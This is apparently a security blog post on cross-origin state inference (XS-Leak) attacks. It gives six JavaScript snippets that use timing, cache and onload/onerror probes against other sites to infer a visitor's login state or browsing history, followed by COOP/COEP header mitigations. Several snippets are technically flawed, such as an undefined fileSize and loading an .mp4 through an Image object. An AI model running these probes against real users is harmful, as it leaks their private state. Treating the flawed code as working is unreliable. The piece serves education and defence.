Listen to this Post
Introduction:
Cross-Origin State Inference (COSI) attacks represent a sophisticated evolution in the landscape of side-channel threats, specifically targeting web applications. By leveraging fundamental browser mechanisms, attackers can infer a user’s state or actions on a target site without direct access, posing a significant risk to privacy and security.
Learning Objectives:
- Understand the core mechanics of Cross-Origin State Inference (COSI) attacks and how they differ from traditional XSS.
- Learn to identify and mitigate potential COSI vectors in web applications through secure coding practices.
- Implement browser-level and server-side defenses to protect users from state inference leaks.
You Should Know:
1. Detecting Resource Load Times with PerformanceTiming
The `performance.timing` API can be exploited to measure how long a resource takes to load, which can indicate if a user is logged in or has accessed a specific page based on cache status.
var start = performance.now();
fetch('https://vulnerable-site.com/secret-page', {mode: 'no-cors'})
.then(() => {
var loadTime = performance.now() - start;
console.log('Resource load time:', loadTime);
// Shorter times may indicate a cached (previously visited) resource
});
Step-by-step guide:
This code snippet measures the time taken to fetch a resource from a target origin. An attacker’s site can initiate such a request. A significantly faster load time suggests the resource was cached, implying the user has visited the ‘secret-page’ before. This information leak can be used to map a user’s browsing history or infer their login status on the target application.
2. Exploiting Cache Timing with `fetch()` and AbortController
Modern JavaScript allows for precise timing of cache hits versus misses using the Fetch API combined with AbortController to avoid unnecessary network traffic.
const controller = new AbortController();
const signal = controller.signal;
setTimeout(() => controller.abort(), 100); // Abort after 100ms
fetch('https://target-app.com/profile-image.jpg', {mode: 'no-cors', signal})
.then(() => console.log('Cache HIT (likely logged-in)'))
.catch(() => console.log('Cache MISS or slow network (likely logged-out)'));
Step-by-step guide:
This script attempts to fetch a resource that typically requires authentication (like a profile image). It uses an AbortController to cancel the request after 100ms. If the request completes before the abort, the resource was likely served from the browser’s cache (a “hit”), indicating the user is authenticated. A timeout and catch suggest it was a “miss,” potentially meaning the user is logged out.
3. XS-Leaks via Error Events and Onload/Onerror Handlers
Differences in response codes or CORS policies can be detected by attaching handlers to an embedded resource, such as an image or script.
var script = document.createElement('script');
script.src = "https://vulnerable-site.com/state-dependent-endpoint";
script.onload = () => console.log("State: Condition A (e.g., Logged In)");
script.onerror = () => console.log("State: Condition B (e.g., Logged Out)");
document.head.appendChild(script);
Step-by-step guide:
This technique creates a script element pointing to an endpoint that behaves differently based on user state (e.g., returns a 200 OK when logged in and a 404 when not). The `onload` event fires for successful loads (2xx status), while `onerror` fires for failures (4xx, 5xx, CORS errors). By observing which event triggers, an attacker can infer the user’s state on the target site.
4. Frame Counting Techniques for Page State Inference
The number of frames or iframes on a page can sometimes reveal information. An attacker can try to count these from a cross-origin context.
var iframe = document.createElement('iframe');
iframe.src = "https://target-site.com/dashboard";
iframe.onload = function() {
try {
var frameCount = frames.length; // or iframe.contentWindow.frames.length
console.log("Inferred frame count:", frameCount);
} catch (e) {
// Cross-origin block will be hit if unable to access
console.log("Cross-origin access denied, but other techniques apply");
}
};
document.body.appendChild(iframe);
Step-by-step guide:
This code embeds the target site in an iframe. After it loads, it attempts to access the `frames` collection within the iframe. While direct access will be blocked by the Same-Origin Policy, the mere attempt and subsequent error, or the ability to measure loading time for a frame-heavy page versus a simple one, can leak state information indirectly.
5. Network Bandwidth Probing with Large Image Requests
An attacker can measure the time to download a large, state-specific resource to infer if a user has access, which might indicate membership status or tiered service levels.
var img = new Image();
var startTime = Date.now();
img.src = "https://premium-service.com/large-video-file.mp4"; // Large, access-controlled file
img.onload = function() {
var bandwidth = (fileSize / (Date.now() - startTime)); // Approximate bandwidth calculation
console.log("Load time suggests access status");
};
img.onerror = function() {
console.log("Resource access denied or not found");
};
Step-by-step guide:
This method involves loading a large file that is only accessible under certain conditions (e.g., a premium video). The time taken to load the resource is measured. A successful, fast load implies the user has access and the file was potentially cached. An error or a very long load time (suggesting a full download from an external server) can indicate the user does not have access, leaking service tier information.
6. Browser Cache Partitioning Bypass Attempts
Understanding and testing the limits of cache partitioning is crucial. While modern browsers partition caches by origin, some shared resources might still be exploitable.
<!-- Attacker's Page: probing-shared-resource.html -->
<script>
function probeCache(resourceURL) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.href = resourceURL;
var start = performance.now();
link.onload = function() {
var loadTime = performance.now() - start;
document.getElementById('result').innerText = `Load Time: ${loadTime}ms`;
};
document.head.appendChild(link);
}
// Probe for a shared CSS file used by the target application
probeCache('https://target-app.net/shared-ui-framework.css');
</script>
<div id="result"></div>
Step-by-step guide:
This HTML/JavaScript code attempts to load a shared resource, like a common CSS framework used by the target application. It measures the load time. If the resource is already in a shared cache partition (which is becoming less common due to keyed partitions), it will load faster. This technique is more historical but underscores why strict cache partitioning is a critical browser defense.
- Mitigation: Deploying Cross-Origin Opener Policy (COOP) and Cross-Origin Embedder Policy (COEP)
The primary defense against many timing and state inference attacks is to isolate your site’s origin using COOP and COEP headers, placing it in a cross-origin isolated context.
HTTP Response Headers Configuration:
Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site
Step-by-step guide:
To implement these crucial defenses, configure your web server to send these HTTP response headers. The `Cross-Origin-Opener-Policy: same-origin` header prevents other documents from maintaining a reference to your window, severing a direct communication channel. The `Cross-Origin-Embedder-Policy: require-corp` header forces all loaded resources to explicitly opt-in to being loaded via Cross-Origin-Resource-Policy or CORS. This combination isolates your origin, preventing many cross-origin information leaks by making powerful APIs like `performance.measureUserAgentSpecificMemory()` and `sharedarraybuffer` unavailable to non-isolated contexts.
What Undercode Say:
- The Illusion of Safety: Merely avoiding Cross-Origin Resource Sharing (CORS) errors is no longer sufficient for security. COSI attacks prove that even “safe”, no-cors requests can leak significant information through timing, cache status, and error event side channels. Developers must shift their mindset from simply preventing data exfiltration to preventing state inference altogether.
- Defense in Depth is Non-Negotiable: Relying on a single mitigation, like cache partitioning, is a flawed strategy. A robust defense requires a layered approach, combining secure coding on the server (using same-site cookies, randomizing response times), deploying modern browser security headers (COOP, COEP, CORP), and conducting regular security audits specifically focused on side-channel vulnerabilities.
The analysis suggests that COSI attacks are not merely theoretical but represent a practical and evolving threat class. As web applications become more complex and handle increasingly sensitive data, the vectors for state inference will multiply. The security community’s response, primarily through browser-level isolation features, is a step in the right direction. However, the widespread adoption of these defenses is lagging, leaving many applications exposed. The sophistication of these attacks underscores the need for automated security tooling to evolve and detect such subtle leakages, moving beyond traditional vulnerability scanning.
Prediction:
The refinement of COSI attacks will inevitably lead to their weaponization in targeted campaigns, particularly for corporate espionage and identity verification bypass. As defenses like cache partitioning become universal, attackers will pivot towards more subtle techniques, potentially leveraging machine learning to analyze complex timing patterns from multiple vectors simultaneously. Furthermore, the integration of these methods with other exploit chains will create powerful composite attacks, making attribution and detection significantly more challenging for defense teams. The arms race between browser vendors hardening platforms and attackers discovering new side channels is set to intensify, making cross-origin isolation a baseline requirement for all security-sensitive web applications within the next two years.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Devansh Batham – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
